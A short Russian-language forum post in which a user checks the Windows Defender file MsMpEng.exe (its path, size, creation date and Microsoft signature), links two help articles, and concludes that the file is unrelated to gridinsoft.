C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MsMpEng.exe
125кБ
Дата создания - первые часы моей работы на компе.
Цифровые подписи - Microsoft Windows publisher

Спросила у Гугла.
https://remontka.pro/msmpeng-exe/
https://nastroyvse.ru/opersys/win/pr...processor.html
Примерно поняла, что это.
Не имеет отношения к gridinsoft.

----------

